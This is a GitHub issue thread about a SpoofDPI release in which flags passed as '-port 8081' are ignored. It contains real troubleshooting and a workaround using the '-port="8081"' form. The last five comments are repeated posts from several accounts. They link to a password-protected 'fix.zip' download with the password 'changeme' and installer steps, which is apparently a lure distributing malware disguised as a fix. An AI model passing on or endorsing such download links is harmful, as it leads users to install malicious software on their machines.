### ISSUE TITLE
Command-line params are ignored in 0.10.11

### ISSUE THREAD

**Issue by stryaponoff** [xvzc/SpoofDPI#196]
### Version

0.10.11

### Operating System

macOS Sonoma 14.6 (23G80)

### How are you running SpoofDPI?

`./spoof-dpi -port 8081 -window-size 2 -debug`

### Description

Command-line params are parsed correctly in 0.10.10 but completely ignored in 0.10.11.

If I'm trying to pass invalid params, the validation is not passed. If all params are correct then app is running exactly as it being running without params at all.

**Comment by gumista** [comment]
I'm using format ./spoof-dpi -port="8081" -window-size="2" -debug="true" and it works well (on Linux).

**Comment by Ledorub** [comment]
Could you elaborate?

I just installed the latest version with
```sh
go install github.com/xvzc/SpoofDPI/cmd/spoof-dpi@0.10.11
```
and run it with
```sh
-debug -addr '::1' -system-proxy=false -port 45531 -window-size 2
```
The banner shows correct config:
```
• ADDR    : ::1
• PORT    : 45531
• DNS     : 8.8.8.8
• DEBUG   : true
```
The output log contains records like below:
```
2024-08-25T20:06:22+03:00 DBG 78d3a727-80d2eedc-db0f76c6-ba233b60 [HTTPS] window-size: 2
```

**Comment by stryaponoff** [comment]
@gumista Thanks, the format `param="value"` (e.g. `-port="8081"`) is working well, but in 0.10.10 and prior versions I was able to pass it as `-port 8081`

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
